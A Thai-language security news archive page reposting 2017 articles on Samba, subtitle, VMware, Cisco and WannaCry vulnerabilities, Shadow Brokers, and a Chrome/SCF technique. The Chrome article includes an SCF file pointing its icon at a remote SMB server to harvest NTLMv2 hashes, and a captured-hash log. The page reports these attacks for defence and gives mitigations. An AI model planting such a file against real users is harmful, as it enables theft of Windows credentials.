คลังเก็บป้ายกำกับ: VULNERABILITY

พบช่องโหว่บน Samba อายุกว่า 7 ปี ผู้ใช้ Linux ทั่วโลกตกอยู่ในความเสี่ยง

เมื่อวานนี้ Samba ออก Security Advisory อุดช่องโหว่อายุนานกว่า 7 ปี ซึ่งช่วยให้แฮ็คเกอร์สามารถลอบส่งคำสั่งเข้ามารันอุปกรณ์ที่ใช้ระบบปฏิบัติการ Linux จากระยะไกลได้ ผู้ใช้ Samba ทั่วโลกกว่า 100,000 รายเสี่ยงถูกอุปกรณ์ถูกเข้าควบคุมโดยไม่รู้ตัว

Credit: Pavel Ignatov/ShutterStock

Samba เป็นแพ็คเกจซอฟต์แวร์สำหรับระบบ Unix ซึ่งให้บริการ File และ Printer Sharing ผ่านทางโปรโตคอล SMB และ CIFS ซึ่งช่วยให้ผู้ใช้ระบบปฏิบัติการ Linux, macOS, FreeBSD สามารถตั้งค่าแชร์โฟลเดอร์และเข้าถึงโฟลเดอร์ที่แชร์บนคอมพิวเตอร์ที่รัน Windows ได้ เสมือนเป็นตัวประสานระหว่างโปรโตคอล SMB บน UNIX และ Windows

ช่องโหว่ดังกล่าวมีรหัส CVE-2017-7494 ซึ่งส่งผลกระทบบน Samba ตั้งแต่เวอร์ชัน 3.5.0 ซึ่งเริ่มใช้งานตั้งแต่วันที่ 1 มีนาคม 2010 (7 กว่าปีก่อน) เป็นต้นมา จนกระทั่งถึงเมื่อวานนี้ที่ทีม Samba ได้ออกแพทช์เวอร์ชัน 4.6.4, 4.5.10 และ 4.4.14 เพื่ออุดช่องโหว่ดังกล่าว

HD Moore รองประธานฝ่ายวิจัยและพัฒนาของ Atredis Partners ระบุว่า ช่องโหว่นี้สามารถเจาะได้ผ่านทางการเขียนโค้ดเพียงบรรทัดโดยใช้โมดูลบน Metasploit ซึ่งขณะนี้กำลังอยู่ระหว่างการพัฒนา แต่นั่นหมายความว่าสามารถใช้เครื่องมือในการสแกนช่องโหว่และเขียนสคริปต์เพื่อที่โจมตีได้ทันที นอกจากนี้ทาง Rapid7 ยังค้นพบว่ามีอุปกรณ์มากกว่า 104,000 เครื่องที่รันซอฟต์แวร์ Samber ที่มีช่องโหว่แบบออนไลน์อยู่ คาดว่าสาเหตุมาจาก Linux บาง Distribution เปิดการใช้เซอร์วิสของ Samba มาตั้งแต่โรงงาน

สำหรับผู้ที่ใช้งาน Samba เวอร์ชัน 4.4.x, 4.5.x, 4..6.x แนะนำให้อัปเดตแพทช์ล่าสุดเพื่ออุดช่องโหว่ดังกล่าว ส่วนผู้ที่ไม่สามารถอัปเดตแพทช์ไปยังเวอร์ชัน 4.4 ได้ ไม่ว่าจะเป็นข้อจำกัดทางด้านฮาร์ดแวร์หรือความเข้ากันได้ของซอฟต์แวร์ ทีม Samba แนะนำให้แก้ไขปัญหาด้วยการเพิ่มพารามิเตอร์ด้านล่างไปที่ไฟล์ smb.conf แล้วรีสตาร์ท smbd daemon ซึ่งพารามิเตอร์นี้จะช่วยให้แฮ็คเกอร์ไม่สามารถเปิด “Pipe” ซึ่งจะทำให้เขาสามารถอัปโหลดโค้ดแปลกปลอมเข้ามารันได้ อย่างไรก็ตาม การแก้ไขนี้อาจส่งผลกระทบต่อการทำงานร่วมกับคอมพิวเตอร์ Windows

nt pipe support = no

รายละเอียดเชิงเทคนิค: https://www.samba.org/samba/security/CVE-2017-7494.html

ที่มา: https://www.bleepingcomputer.com/news/security/over-104-000-samba-installations-vulnerable-to-remote-takeover-attacks/

from:https://www.techtalkthai.com/7-year-olds-samba-vulnerability-results-in-rce/

Advertisements

ระวัง !! ดูหนังเพลินๆ อาจถูกแฮ็คคอมพิวเตอร์ผ่านไฟล์ Subtitle ที่โหลดมาได้

Check Point ผู้ให้บริหารโซลูชัน Next-generation Firewall ยักษ์ใหญ่ของโลก ออกมาแจ้งเตือนถึงช่องโหว่บนโปรแกรมเล่นวิดีโอ ซึ่งช่วยให้แฮ็คเกอร์สามารถสร้างไฟล์ Subtitle แบบพิเศษขึ้น เพื่อใช้ลอบรันคำสั่งบนเครื่องคอมพิวเตอร์เป้าหมายได้ตามต้องการ

ช่องโหว่นี้ค้นพบบนโปรแกรมเล่นวิดีโอชื่อดังหลายรายการที่รองรับฟีเจอร์ Subtitle ไม่ว่าจะเป็น VLC, Kodi, PopcornTime, Stremio และอื่นๆ โดยมีสาเหตุมาจากการประมวลผลไฟล์ Subtitle ไม่ดีเพียงพอ ส่งผลให้แฮ็คเกอร์สามารถเข้าควบคุมเครื่องคอมพิวเตอร์เป้าหมายได้ทันที วิดีโอด้านล่างสาธิตการโจมตีผ่านช่องโหว่ดังกล่าว

Check Point คาดการณ์ว่า มีผู้ที่ใช้โปรแกรมเล่นวิดีโอหรือสตรีมวิดีโอออนไลน์กว่า 200 ล้านคนที่ซอฟต์แวร์ที่มีช่องโหว่ ส่งผลให้การโจมตีนี้อาจส่งผลกระทบเป็นวงกว้าง ที่แย่กว่านั้นคือ ผู้ใช้หลายคนดาวน์โหลดไฟล์ Subtitile จากคลัง Subtitle บนอินเทอร์เน็ต ที่อนุญาตให้ใครก็ตามสามารถอัปโหลดไฟล์ Subtitle เข้าไปได้ จึงเป็นไปได้สูงทีแฮ็คเกอร์อาจใช้ช่องทางนี้ในการแพร่กระจายการโจมตีออกไป

จนถึงตอนนี้ VLC และ PopcornTime ได้ออกแพทช์เพื่ออุดช่องโหว่เป็นที่เรียบร้อยแล้ว ในขณะที่โปรแกรมอื่นๆ เช่น Kodi และ Stremio กำลังอยู่ระหว่างดำเนินการแก้ไข แนะนำให้ผู้ใช้ทุกคนรีบอักเดตแพทช์ล่าสุดโดยเร็ว

ที่มา: http://blog.checkpoint.com/2017/05/23/hacked-in-translation/

from:https://www.techtalkthai.com/computers-can-be-hacked-by-subtitle-files/

สิ่งที่คุณต้องรู้เกี่ยวกับฤทธิ์เดชของแรนซั่มแวร์ Wanna Decryptor 2.0

เมื่อวันศุกร์ที่ 12 พ.ค. ที่ผ่านมาถือเป็นวิกฤตการณ์ที่หนักหน่วงมากในหลายองค์กร อันเนื่องมาจากการแพร่กระจายตัวเองอย่างรวดเร็วของแรนซั่มแวร์ Wanna Decrypter 2.0 ที่เริ่มจากการโจมตีโรงพยาบาลทั่วทั้งอังกฤษ ก่อนที่จะขยายวงการโจมตีไปทั่วโลก

การโจมตีครั้งนี้พบว่ามีการใช้ประโยชน์จากช่องโหว่บนวินโดวส์ ที่ไมโครซอฟท์ได้ออกแพทช์มาแล้วตั้งแต่เมื่อมีนาคมที่ผ่านมา ช่องโหว่นี้อยู่บนเซอร์วิสที่ชื่อ Windows Server Message Block (SMB) ที่คอมพิวเตอร์ที่ใช้วินโดวส์นั้นใช้สำหรับแชร์ไฟล์และเครื่องพิมพ์ทั่วทั้งเครือข่ายขององค์กร โดยไมโครซอฟท์ได้อธิบายปัญหานี้ไว้ในหัวข้อด้านความปลอดภัยรหัส MS17-010

SophosLabs กล่าวว่า แรนซั่มแวร์นี้ ซึ่งรู้จักกันในชื่อ WannaCry, WCry, WanaCrypt และ WanaCrypt0r นั้น จะเข้ารหัสไฟล์ของเหยื่อ แล้วเปลี่ยนนามสกุลไฟล์ให้อยู่ในรูป .wnry, .wcry, .wncry และ .wncrypt

Sophos ได้ปกป้องลูกค้าจากอันตรายนี้ โดยตรวจจับมัลแวร์เหล่านี้ภายใต้ชื่อ Troj/Ransom-EMG, Mal/Wanna-A, Troj/Wanna-C, และ Troj/Wanna-D ซึ่งลูกค้าที่ใช้ Intercept X จะพบว่าแรนซั่มแวร์นี้ถูกสกัดกั้นโดย CryptoGuard พร้อมทั้งมีการเปิดเผยรายละเอียดในรูปของ Knowledge Base Article (KBA) ให้ลูกค้าอีกด้วย

NHS ยอมรับว่าโดยโจมตี
National Health Service hospitals (NHS) ในสหราชอาณาจักร ได้รับผลกระทบอย่างรุนแรงจากการโจมตีระยะแรก โดยทั้งระบบโทรศัพท์และบริการด้านไอทีอื่นๆ ต่างถูกกักไว้เรียกค่าไถ่ ทางฝ่ายไอทีของ NHS ได้โพสต์ประกาศว่า หน่วยงานในสังกัดหลายแห่งโดนแรนซั่มแวร์โจมตี โดยเชื่อว่าเป็นมัลแวร์ชื่อ Wanna Decryptor ซึ่งปัจจุบันยังไม่มีหลักฐานชี้ชัดว่าข้อมูลของผู้ป่วยถูกเข้าถึงด้วยหรือเปล่า แต่ก็กำลังทำงานร่วมกับศูนย์ความปลอดภัยทางไซเบอร์แห่งชาติอย่างใกล้ชิด และจะแจ้งความคืบหน้าอีกครั้งโดยเร็วที่สุด

ซึ่งทางศูนย์ความปลอดภัยทางไซเบอร์แห่งชาติ, กระทรวงสาธารณสุข, และ NHS ของสหราชอาณาจักร ต่างทำงานอย่างหนักตั้งแต่เมื่อวันศุกร์ที่ผ่านมาเพื่อช่วยเหลือโรงพยาบาลที่ได้รับผลกระทบ รวมถึงระบบไอทีที่โดนเล่นงานจนต้องปิดการใช้งานเพื่อจำกัดบริเวณการแพร่กระจายของแรนซั่มแวร์

คำแนะนำเพิ่มเติมจาก Sophos
ต่อไปนี้เป็นข้อมูลอัพเดตสายพันธุ์แรนซั่มแวร์ที่เกี่ยวข้องกับการโจมตีครั้งนี้ ที่ทาง Sophos ได้ให้การปกป้องไว้ครบถ้วนแล้ว:

ดังที่กล่าวไว้ข้างต้น Sophos ได้อัพเดตข้อมูลเพื่อปกป้องลูกค้าเรียบร้อยแล้ว ผู้ที่ใช้งานทั้ง Intercept X และ EXP ไม่จำเป็นต้องทำอะไรเพิ่มเติม ส่วนผู้ที่ใช้โซลูชั่น Sophos Endpoint Protection และ Sophos Home ควรอัพเดตให้เป็นรุ่นล่าสุดในทันที
วิธีป้องกันอันตรายนี้
เราแนะนำให้ผู้ที่ยังไม่ได้ทำดำเนินการอะไร ให้ทำดังต่อไปนี้:

– ติดตั้งแพทช์บนระบบของคุณ แม้ว่าคุณจะยังใช้รุ่นที่ไม่ได้มีการสนับสนุนจากผู้ผลิตแล้ว อันได้แก่ วินโดวส์ XP, วินโดวส์ 8, หรือวินโดวส์เซิร์ฟเวอร์ 2003 โดยแนะนำให้อ่านคำแนะนำสำหรับลูกค้าของไมโครซอฟท์เรื่องการโจมตีจาก WannaCrypt ที่ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

– อ่านคำแนะนำของ Sophos บน Knowledge Base Article เกี่ยวกับแรนซั่มแวร์ Wanna Decrypt0r 2.0 ที่ https://community.sophos.com/kb/en-us/126733

– สำรองข้อมูลเป็นประจำ และจัดเก็บข้อมูลที่สำรองล่าสุดไว้ข้างนอกองค์กร เนื่องจากมีหลากหลายช่องทางมากนอกจากแรนซั่มแวร์ที่ไฟล์สำรองไว้จะเป็นอันตราย ไม่ว่าจะเป็นอัคคีภัย, น้ำท่วม, โดนจารกรรม, แล็ปท็อปตกพื้น, หรือแม้แต่การกดลบโดยไม่ได้ตั้งใจ คุณควรเข้ารหัสข้อมูลที่สำรองไว้ เพื่อไม่ต้องกังวลว่าข้อมูลดังกล่าว หรืออุปกรณ์ที่มีข้อมูลที่สำรองไว้จะตกไปอยู่ในมือของผู้ไม่ประสงค์ดี

– พึงระวังการเปิดไฟล์แนบที่น่าสงสัย ยังเป็นคำแนะนำพื้นฐานที่ควรปฏิบัติอย่างแข็งแกร่ง ในการที่ไม่ควรเปิดไฟล์เอกสารใดๆ จนกว่าจะแน่ใจว่าจำเป็นต้องใช้งานไฟล์นั้นจริงๆ ซึ่งท่าคุณยังสงสัยที่มาของไฟล์นั้นอยู่ก็ไม่ควรเปิดขึ้นมาเด็ดขาด

– เลือกใช้โซลูชั่นความปลอดภัยอย่าง Sophos Intercept X และ Sophos Home Premium Beta สำหรับผู้ใช้ตามบ้าน (ไม่ใช่ลูกค้าธุรกิจ) ที่สามารถหยุดยั้งแรนซั่มแวร์ตั้งแต่ต้นเหตุ ด้วยการสกัดกั้นการเข้ารหัสไฟล์ที่ไม่ได้รับอนุญาต

ที่มา : https://nakedsecurity.sophos.com/2017/05/12/wanna-decrypter-2-0-ransomware-attack-what-you-need-to-know/

from:https://www.enterpriseitpro.net/?p=6716

VMware ออกแพทช์อุดช่องโหว่สำคัญบน VMware Workstation 12 Pro และ Player

VMware ออกแพทช์อุดช่องโหว่สำคัญบน VMware Workstation 12 Pro และ Player จำนวน 2 จุด ได้แก่ Insecure Library Loading และ NULL Pointer dereference กระทบทั้งบน Windows และ Linux แนะนำผู้ใช้งานทำการอัปเดตทันที

Credit: Pavel Ignatov/ShutterStock

VMware ออก Security Advisory VMSA-2017-0009 แจ้งเตือนช่องโหว่บน VMware Workstation Pro และ Player จำนวน 2 จุด โดยช่องโหว่แรกถูกค้นพบโดยนักวิจัยทางด้านความปลอดภัยของ Google ProjectZero ซึ่งก่อนหน้านี้ได้ค้นพบบั๊กบน Xen Hypervisor และ Linux Kernel มาแล้ว โดยช่องโหว่นี้มีรหัส CVE-2017-4915 เกิดจากการใช้งานไฟล์ Library ที่ไม่ปลอดภัย ผ่านทาง ALSA Sound Driver ซึ่งแฮ็กเกอร์สามารถโจมตีผ่านจุดนี้และยกระดับสิทธิของตนเองขึ้นเป็น Root ใน Linux host ได้

อีกช่องโหว่หนึ่งมีรหัส CVE-2017-4916 เกิดจากช่องโหว่ NULL pointer dereference ที่อยู่ใน vstor2 driver ทำหน้าที่เป็น Virtual Storage driver ซึ่งสามารถทำให้ผู้ใช้งานที่มีสิทธิเป็น Normal user สามารถทำ Denial-of-service ใน Windows host ได้ทันที

ผู้ที่ใช้งาน VMware Workstation Pro และ Player เวอร์ชัน 12.x ควรอัปเดตเป็นเวอร์ชัน 12.5.6 เพื่ออุดช่องโหว่ดังกล่าวทันที

ที่มา : https://threatpost.com/vmware-patches-multiple-security-issues-in-workstation/125805/

from:https://www.techtalkthai.com/vmware-releases-important-patches-for-vmware-workstation-pro-and-player/

เตือน !! ช่องโหว่บน Chrome เสี่ยงถูกแฮ็คเกอร์ขโมยข้อมูลล็อกอิน

Bosko Stankovic นักวิจัยด้านความมั่นคงปลอดภัยจาก DefenseCode ออกมาแจ้งเตือนถึงช่องโหว่บนการตั้งค่าเริ่มต้นของ Google Chrome เวอร์ชันล่าสุด ซึ่งช่วยให้แฮ็คเกอร์สามารถขโมยข้อมูลล็อกอินของผู้ใช้ระบบปฏิบัติการ Windows แม้แต่ Windows 10 ที่อัปเดตแพทช์ล่าสุดจากระยะไกลได้ ชี้เป็นช่องโหว่แบบเดียวกับที่ Stuxnet ใช้โจมตีโรงไฟฟ้านิวเคลียร์ของอิหร่าน

Credit: ShutterStock.com

Stankovic ระบุว่า เพียงแค่ผู้ใช้เข้าถึงโฟลเดอร์ที่มีไฟล์ SCF ที่แฮ็คเกอร์ออกแบบมาเป็นพิเศษ ข้อมูลล็อกอินของผู้ใช้ เช่น ชื่อผู้ใช้และรหัสผ่านที่ถูกแฮชจะถูกส่งไปยังแฮ็คเกอร์ผ่านทาง Google Chrome และโปรโตคอล SMB ทันที โดยการโจมตีนี้อาศัยการผสาน 2 เทคนิคเข้าด้วยกัน คือ เทคนิคที่ Stuxnet ใช้ และเทคนิคที่ถูกเผยแพร่ในงานประชุม Black Hat ปี 2015

SCF (Shell Command File) เป็นไฟล์ Shortcut แบบหนึ่งที่ทำงานคล้ายกับไฟล์ LNK และถูกออกแบบมาเพื่อรองรับการรันคำสั่ง Windows Explorer ในระดับหนึ่ง เช่น เปิดหน้าต่าง Windows Explorer หรือแสดงหน้า Desktop โดยพื้นฐานแล้ว ลิงค์ Shortcut บนหน้า Desktop จะเป็นไฟล์ Text ที่มี Syntax ของ Shell Code เฉพาะตัว ซึ่งจะกำหนดตำแหน่งของไฟล์ไอคอนที่จะโหลด ชื่อแอพพลิเคชัน และตำแหน่งของแอพพลิเคชัน เช่น

[Shell]
Command=2
IconFile=explorer.exe,3

เนื่องจาก Chrome เชื่อว่าไฟล์ SCF ของ Windows เป็นไฟล์ปกติ ส่งผลให้แฮ็คเกอร์สามารถหลอกให้เหยื่อเข้าไปยังหน้าเว็บไซต์ของตนเองซึ่งแฝงไฟล์ SCF ที่ออกแบบมาเป็นพิเศษ ไฟล์ดังกล่าวจะถูกดาวน์โหลดไปยังเครื่องของเหยื่อโดยอัตโนมัติโดยที่ไม่มีการเด้งหน้าต่างแจ้งเตือนหรือให้กดยืนยันใดๆ และตราบเท่าที่เหยื่อเปิดโฟลเดอร์ที่มีไฟล์ SCF นั้นอยู่ ไม่ช้าก็เร็ว ไฟล์ดังกล่าวจะรันตัวเองเพื่อโหลดไฟล์ไอคอนมา ต่อให้เหยื่อไม่คลิกบนไฟล์นั้นก็ตาม

แฮ็คเกอร์จึงอาศัยช่องโหว่ของการทำงานของ Chrome และไฟล์ SCF นี้ ในการแก้ไขตำแหน่งของไฟล์ไอคอนไปเป็นตำแหน่งของ SMB Server ของตนเองแทน ส่งผลให้เมื่อไฟล์ SCF พยายามที่จะโหลดไฟล์ไอคอนมา มันจะถูกหลอกให้ทำการพิสูจน์ตัวตนกับ Remote Server ของแฮ็คเกอร์ผ่านทางโปรโตคอล SMB ซึ่งข้อมูลชื่อผู้ใช้และรหัสผ่านที่ถูกแฮชจะถูกส่งไปพิสูจน์ตัวตนโดยอัตโนมัติ ผลลัพธ์คือแฮ็คเกอร์ได้ข้อมูลล็อกอินของเหยื่อโดยทันที

[Shell]
IconFile=\\170.170.170.170\icon

เทคนิคนี้เป็นเทคนิคเดียวกับที่ Stuxnet เคยใช้กับไฟล์ LNK ในอดีต ส่งผลให้ Microsoft บังคับให้ไฟล์ LNK โหลดไฟล์ไอคอนจากภายในเครื่องคอมพิวเตอร์ของตัวเองเท่านั้น ทำให้ช่องโหว่บนไฟล์ LNK หายไป แต่บนไฟล์ SCF ยังคงมีอยู่

คำถามถัดมา แล้วทำไมคอมพิวเตอร์ถึงส่งข้อมูลชื่อผู้ใช้และรหัสผ่านที่ถูกแฮชไปพิสูจน์ตัวตนกับ SMB Server ของแฮ็คเกอร์โดยอัตโนมัติ ?

คำตอบคือ สาเหตุมาจากกลไกการพิสูจน์ตัวตนผ่าน NTLM Challenge/Response ผ่านทางโปรโตคอล SMB ซึ่งสรุปการทำงานได้เป็น 4 ขั้นตอน ดังนี้

  1. ผู้ใช้ Windows พยายามล็อกอินเข้าสู่ Server
  2. Server ตอบกลับด้วยการ Challenge โดยบอกให้ผู้ใช้เข้ารหัสค่าที่ใช้ Challenge โดยใช้รหัสผ่านที่ถูกแฮช แล้วส่งกลับมา
  3. Windows จัดการคำร้องขอของ Server โดยส่งชื่อผู้ใช้และรหัสผ่านที่ถูกแฮช (ผ่านทางการเข้ารหัสค่าที่ใช้ Challenge) กลับไปยัง Server
  4. Server รับคำตอบและยืนยันการพิสูจน์ตัวตนในกรณีที่รหัสผ่านทีถูกแฮชมาค่าถูกต้อง

ดังนั้น เมื่อเทียบกับการโจมตีผ่านไฟล์ SCF เครื่องของเหยื่อจะพยายามพิสูจน์ตัวตนกับ SMB Server โดยอัตโนมัติ โดยส่งชื่อผู้ใช้และรหัสผ่านที่ถูกแฮชด้วย NTLMv2 กลับไปยัง SMB Server ตามขั้นตอนที่ 3 ในกรณีที่ผู้ใช้อยู่ในเครือข่ายขององค์กร ข้อมูลล็อกอินที่ถูกส่งไปยังแฮ็คเกอร์จะเป็นข้อมูลที่ SysAdmin ขององค์กรกำหนดให้ แต่ในกรณีที่เป็นผู้ใช้ตามบ้าน ข้อมูลล็อกอินของ Windows จะถูกส่งไปแทน

[*] SMB Captured - 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000
00000000000
Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000

ถึงแม้ว่ารหัสผ่านจะถูกแฮชอยู่ แต่ไม่ใช่เรื่องยากที่แฮ็คเกอร์จะทำการ Brute Force เพื่อให้ได้รหัสผ่านในรูปของ Plain Text

วิธีป้องกันการโจมตีแบบนี้สามารถทำได้ง่ายมาก เพียงแค่ใช้ Firewall บล็อกการเชื่อมต่อ SMB จากภายในที่ส่งไปภายนอก (TCP พอร์ต 139 และ 445) เพื่อไม่ให้เครื่องคอมพิวเตอร์เชื่อมต่อกับ SMB Server ภายนอกองค์กร นอกจากนี้ Stankovic ยังแนะนำให้ผู้ใช้ยกเลิกการดาวน์โหลดไฟล์อัตโนมัติบน Google Chrome โดยไปที่ Settings → Show advanced settings → และเลือก “Ask where to save each file before downloading” เพื่อให้ผู้ใช้สามารถตรวจสอบไฟล์ที่ดาวน์โหลดเข้าสู่เครื่องคอมพิวเตอร์ก่อนได้ทุกครั้ง

ที่มา: http://thehackernews.com/2017/05/chrome-windows-password-hacking.html

from:https://www.techtalkthai.com/hackers-can-steal-windows-credentials-via-chrome-and-smb/

Shadow Brokers เตรียมปล่อย Zero-day อื่นในเดือนมิถุนายนนี้

Shadow Brokers กลุ่มแฮ็คเกอร์ชื่อกระฉ่อนซึ่งอยู่เบื้องหลังการปล่อยช่องโหว่ SMBv1 บนระบบปฏิบัติการ Windows ที่ WannaCry Ransomware ใช้สร้างความโกลาหลจนถึงตอนนี้ ออกแถลงการณ์เมื่อไม่กี่ชั่วโมงที่ผ่านมา ชี้เตรียมปล่อยช่องโหว่ Zero-day และเครื่องมือ Exploit อื่นๆ ทั้งบนแพลตฟอร์ม PC และ Mobile ในเดือนมิถุนายนนี้

Credit: Mikko Lemola/ShutterStock

Shadow Brokers ได้แถลงการณ์เตรียมให้บริการใหม่ โดยจะปล่อยช่องโหว่และเครื่องมือ Exploit แบบ Zero-day ผ่านทางโมเดล Subscription รายเดือน ผู้ที่เป็นสมาชิกของ “Wine of Month Club” จะสามารถเข้าถึงช่องโหว่และเครื่องมือแฮ็คใหม่ๆ แบบเอ็กซ์คลูซีฟได้ ดังนี้

  • Exploits สำหรับเว็บเบราเซอร์ เราท์เตอร์ และสมาร์ทโฟน
  • Exploits สำหรับระบบปฏิบัติต่างๆ รวมไปถึง Windows 10
  • ข้อมูลที่แฮ็คได้จากธนาคารและ Swift Providers
  • ข้อมูลระบบเครือข่ายที่ขโมยมาจาก Nuclear Missile Program จากรัสเซีย จีน อิหร่าน และเกาหลีเหนือ

ถึงแม้ว่าจะยังไม่ทราบว่าสิ่งที่ Shadow Brokers เสนอมาจะมีอยู่จริง และใช้งานได้จริงหรือไม่ แต่คิดว่าหลายฝ่ายคงต้องตระหนักและเตรียมตัวรับมือ เนื่องจากตอนนี้เรามีประสบการณ์แล้วว่า EternalBlue Exploit และ DoublePulsar Backdoor ที่พัฒนาโดย NSA ถูก Shadow Brokers นำมาเปิดเผยสู่สาธารณะจนนำไปสู่การแพร่ระบาดของ WannaCry Ransomware ในที่สุด

ก่อนหน้าที่ Shadow Brokers จะเปิดโมเดลแบบ Subscription นี้ กลุ่มแฮ็คเกอร์เคยนำอาวุธไซเบอร์ที่ขโมยมาจากทีมแฮ็คหัวกะทิของ NSA นามว่า Equation Group ออกประมูล โดยเริ่มต้นราคาที่ 1,000,000 Bitcoins แต่ผลปรากฏว่าไม่มีใครสนใจ จนพวกเขาต้องเปลี่ยนแผนไปขายแยกประเภทในตลาดมืดออนไลน์ ไม่ว่าจะเป็น Exploits, Trojans หรือ Implant โดยมีราคาตั้งแต่ 1 – 100 Bitcoins แต่สุดท้ายก็ไม่มีกระแสตอบรับกลับ จนทำให้ในที่สุด Shadow Brokers จึงเริ่มทยอยปล่อยช่องโหว่และเครื่องมือต่างๆ จนมาถึง ช่องโหว่ SMBv1 บน Windows เมื่อเดือนที่ผ่านมา ซึ่งก่อให้เกิด WannaCry Ransomware ที่สามารถแพร่ระบาดไปยังอุปกรณ์ทั่วโลกกว่า 200,000 เครื่องจาก 150 ประเทศในเวลาเพียงแค่ 48 ชั่วโมง

นอกจากนี้ Shadow Brokers ยังออกมาวิจารณ์รัฐบาลสหรัฐฯ อีกว่า ที่เกิดเหตุการณ์ใหญ่โตแบบนี้ เพราะทางรัฐบาลจ่ายเงินให้บริษัท IT ขนาดใหญ่ ให้ไม่ออกอัปเดตแพทช์ช่องโหว่ Zero-day เพื่อที่ตนเองจะได้คอยสอดแนมต่อไปได้ และยังได้กล่าวหาว่า จริงๆ แล้วในทีม Google Project Zero ต้องมีอดีตสมาชิกของ Equation Group อยู่แน่นอน เพราะสามารถออกแพทช์ช่องโหว่ Wormable Zero-day ได้เร็วเป็นประวัติการณ์ อย่างกับรู้ว่าจะเกิดเหตุการณ์แพร่ระบาดอย่าง WannaCry ขึ้น

ที่มา: http://thehackernews.com/2017/05/shodow-brokers-wannacry-hacking.html

from:https://www.techtalkthai.com/shadow-brokers-will-leak-more-zero-days/

Cisco ออกแพทช์อุดช่องโหว่ Zero-day จาก WikiLeaks บน Switch กว่า 300 รุ่น

หลังจากที่ Cisco ออกมาชี้แจงถึงช่องโหว่บน Switch กว่า 300 รุ่นที่ใช้ระบบปฏิบัติการ Cisco IOS และ Cisco IOS XE ซึ่งถูกเปิดเผยในเอกสาร Vault 7 โดย WikiLeaks เมื่อเดือนมีนาคมที่ผ่านมา พร้อมให้คำแนะนำสำหรับแก้ปัญหาเบื้องต้น ล่าสุด Cisco ได้ออกแพทช์สำหรับอุดช่องโหว่ดังกล่าวเป็นที่เรียบร้อยแล้ว

Credit: Visual Generation/ShutterStock

ช่องโหว่ที่กล่าวถึงนี้ (CVE-2017-3881) เป็นช่องโหว่ที่เชื่อว่าหน่วยข่าวกรองของสหรัฐฯ หรือ CIA ใช้เพื่อสอดแนมองค์กรต่างๆ โดยมีความรุนแรงระดับ Critical (9.8 จาก 10) เป็นช่องโหว่ที่ปรากฏบน Cisco Cluster Management Protocol (CMP) บนซอฟต์แวร์ Cisco IOS และ Cisco IOS XE ที่ถึงแม้จะไม่ได้เปิดใช้งาน CMP อยู่ แฮ็คเกอร์ก็สามารถเจาะช่องโหว่ได้จากระยะไกล รวมไปถึงสั่ง Reload อุปกรณ์ โจมตีแบบ Remote Code Execution และทำการยกระดับสิทธิ์ต่อไปได้โดยไม่จำเป็นต้องพิสูจน์ตัวตน

ช่องโหว่นี้เกิดขึ้นที่การเชื่อมต่อ Telnet ภายใน CMP ด้วยปัจจัย 2 ประการ ได้แก่การเปิดให้คนทั่วไปสามารถเข้าถึง Telnet จากอุปกรณ์ที่ไม่เกี่ยวข้องกับ Cluster ได้ และการประมวลผลคำสั่ง Telnet ที่เกี่ยวกับ CMP ซึ่งยังมีความผิดพลาดอยู่

อุปกรณ์ที่ได้รับผลกระทบประกอบด้วย Catalyst Switch จำนวน 264 รุ่น Industrial Ethernet Switch อีก 51 รุ่น และอุปกรณ์อื่นๆ ที่รัน Cisco IOS อีก 3 รุ่น ดูรายละเอียดอุปกรณ์ทั้งหมดที่ได้รับผลกระทบได้ที่นี่

ผู้ที่ใช้งาน Cisco IOS และ Cisco IOS XE อยู่ สามารถโหลดเครื่องมือ Cisco IOS Software Checker เพื่อใช้ตรวจสอบว่าซอฟต์แวร์ที่ใช้งานอยู่มีช่องโหว่หรือไม่ และสามารถอัปเดตแพทช์ได้อย่างไร ซึ่งตอนนี้ Cisco ได้ออกแพทช์เพื่ออุดช่องโหว่นี้เป็นที่เรียบร้อยแล้ว สำหรับองค์กรที่ต้องรอเข้ากระบวนการ Change Management สามารถดำเนินการแก้ไขชั่วคราวได้โดยการปิดการใช้งาน Telnet และเปลี่ยนไปใช้ SSH แทน

รายละเอียดเพิ่มเติม: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp

from:https://www.techtalkthai.com/cisco-patches-wikileaks-vuln-in-300-switches/